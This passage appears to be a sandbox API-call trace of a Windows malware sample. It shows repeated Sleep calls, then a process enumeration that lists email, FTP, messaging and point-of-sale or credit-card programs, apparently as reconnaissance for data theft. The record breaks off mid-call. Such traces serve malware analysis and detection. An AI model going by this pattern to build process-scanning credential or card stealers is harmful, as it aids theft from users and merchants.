Sleep (dwMilliseconds=0x258) [0279.492] Sleep (dwMilliseconds=0x258) [0279.555] Sleep (dwMilliseconds=0x258) [0279.602] Sleep (dwMilliseconds=0x258) [0279.640] Sleep (dwMilliseconds=0x258) [0279.648] Sleep (dwMilliseconds=0x258) [0279.664] Sleep (dwMilliseconds=0x258) [0279.679] Sleep (dwMilliseconds=0x258) [0279.695] Sleep (dwMilliseconds=0x258) [0279.711] Sleep (dwMilliseconds=0x258) [0279.773] Sleep (dwMilliseconds=0x258) [0279.821] Sleep (dwMilliseconds=0x258) [0279.855] Sleep (dwMilliseconds=0x258) [0279.867] Sleep (dwMilliseconds=0x258) [0279.884] Sleep (dwMilliseconds=0x258) [0279.898] Sleep (dwMilliseconds=0x258) [0279.914] Sleep (dwMilliseconds=0x258) [0279.929] Sleep (dwMilliseconds=0x258) [0279.992] Sleep (dwMilliseconds=0x258) [0280.039] Sleep (dwMilliseconds=0x258) [0280.056] Sleep (dwMilliseconds=0x258) [0280.071] Sleep (dwMilliseconds=0x258) [0280.085] Sleep (dwMilliseconds=0x258) [0280.102] Sleep (dwMilliseconds=0x258) [0280.116] Sleep (dwMilliseconds=0x258) [0280.132] Sleep (dwMilliseconds=0x258) [0280.194] Sleep (dwMilliseconds=0x258) [0280.243] Sleep (dwMilliseconds=0x258) [0280.275] Sleep (dwMilliseconds=0x258) [0280.288] Sleep (dwMilliseconds=0x258) [0280.304] Sleep (dwMilliseconds=0x258) [0280.320] Sleep (dwMilliseconds=0x258) [0280.335] Sleep (dwMilliseconds=0x258) [0280.352] Sleep (dwMilliseconds=0x258) [0280.430] Sleep (dwMilliseconds=0x258) [0280.477] Sleep (dwMilliseconds=0x258) [0280.512] Sleep (dwMilliseconds=0x258) [0280.522] Sleep (dwMilliseconds=0x258) [0280.539] Sleep (dwMilliseconds=0x258) [0280.553] Sleep (dwMilliseconds=0x258) [0280.569] Sleep (dwMilliseconds=0x258) [0280.631] Sleep (dwMilliseconds=0x258) [0280.960] Sleep (dwMilliseconds=0x258) [0280.994] Sleep (dwMilliseconds=0x258) [0281.007] Sleep (dwMilliseconds=0x258) Thread: id = 40 os_tid = 0xec4 [0089.059] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6d4 [0089.089] Process32First (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0089.091] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0089.094] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0089.096] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0089.097] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0089.099] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0089.101] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0089.102] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0089.104] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0089.105] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0089.107] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.109] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.111] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.112] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.114] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.115] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.117] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0089.119] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0089.120] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.122] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0089.124] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0089.126] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.127] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0089.129] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0089.131] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.132] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0089.134] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0089.135] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x53c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0089.137] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_decade_effect.exe")) returned 1 [0089.140] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="at_effort.exe")) returned 1 [0089.142] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0089.144] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="four.exe")) returned 1 [0089.145] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="treatmentabout.exe")) returned 1 [0089.147] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="treat.exe")) returned 1 [0089.148] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="quickly_mention_learn.exe")) returned 1 [0089.150] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="offer_shot.exe")) returned 1 [0089.152] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="total.exe")) returned 1 [0089.153] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="few.exe")) returned 1 [0089.155] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="our-available-watch.exe")) returned 1 [0089.157] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="reality.exe")) returned 1 [0089.159] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="surface.exe")) returned 1 [0089.161] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="wrong.exe")) returned 1 [0089.162] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="future employee.exe")) returned 1 [0089.164] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-majority-recognize.exe")) returned 1 [0089.166] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="land-be-area.exe")) returned 1 [0089.168] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="focus_memory_base.exe")) returned 1 [0089.170] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mrus.exe")) returned 1 [0089.171] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0089.173] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0089.175] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0089.178] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0089.180] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0089.181] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0089.183] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0089.185] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0089.186] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0089.189] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0089.190] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0089.192] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0089.194] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0089.197] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0089.199] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0089.201] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0089.203] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0089.205] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0089.207] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0089.209] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0089.211] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0089.212] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0089.214] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0089.216] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0089.218] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x918, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0089.224] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0089.226] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0089.228] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0089.230] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0089.232] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0089.234] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: 